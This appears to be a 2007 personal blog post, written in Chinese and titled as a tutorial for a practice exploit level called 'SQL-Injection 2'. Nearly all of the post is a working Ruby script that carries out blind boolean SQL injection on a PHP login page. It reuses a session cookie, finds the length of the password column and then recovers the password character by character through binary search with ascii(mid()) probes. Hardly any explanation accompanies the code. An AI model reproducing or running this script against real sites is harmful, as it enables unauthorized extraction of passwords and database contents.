About Me

我的相片
Taipei<->HsinChu, Taiwan
我是 Mashi,叫我 媽許、罵許,我都會回頭XD
2007年12月14日 星期五

[Ruby] MySQL Brute Force Attack & [教學]Exploit 21: "SQL-Injection 2"


# Author : mashimaro
# Last Modify : 2007/12/11

require 'net/http'
require 'net/https'

host = 'www.host_url.com'
path = '/exploits_path/index2.php?login=user'
cookie = 'PHPSESSID=***********************'

http = Net::HTTP.new(host, 80)
#http.use_ssl = true
headers = {
'Cookie' => cookie,
# 'Referer' => 'http://profil.wp.pl/login.html',
# 'Content-Type' => 'application/x-www-form-urlencoded'
}

cmd = 'password';
appear_str = 'Steven Baker';

len = 0;

if(len > 0)
print 'len = ' + len.to_s;
else
len = 1;
print 'len = 1';
# Step 1. 判斷回傳長度
while(1)
resp, data = http.get(path + '\'%20and%20length(' + cmd + ')>=' + (len + 1).to_s + '--\'',

headers)
break if(!data.index(appear_str));
print 8.chr * len.to_s.length;
len = len + 1;
print len.to_s;
end
end


puts '';
i = 1;
print 'str = ';

# Step 2. 找出字串
while(i <= len) print 80.chr; resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=80--\'',

headers);
if(data.index(appear_str))
min = 80;
max = 127;
else
min = 32;
max = 79;
end

while(min != max)
mid = ((min + max + 1) / 2).to_i;
print 8.chr;
print mid.chr;
str = ' [' + min.to_s + ' ' + mid.to_s + ' ' + max.to_s + ']';
print str;
resp, data = http.get(path + '\'%20and%20ascii(mid(' + cmd + ',' + i.to_s + ',1))>=' +

mid.to_s + '--\'', headers);
if(data.index(appear_str))
min = mid;
else
max = mid - 1;
end
if(min > max)
puts 'error: min > max';
exit(0);
end
print (8.chr) * str.length + ' ' * str.length + (8.chr) * str.length;
end

print 8.chr + min.chr;

i = i + 1;
end

puts "\r\n\r\n" + 'sql brute force search done!!';

0 意見:

 
Blogger Template Layout Design by [ METAMUSE ] : Code Name BlackCat 2.0.0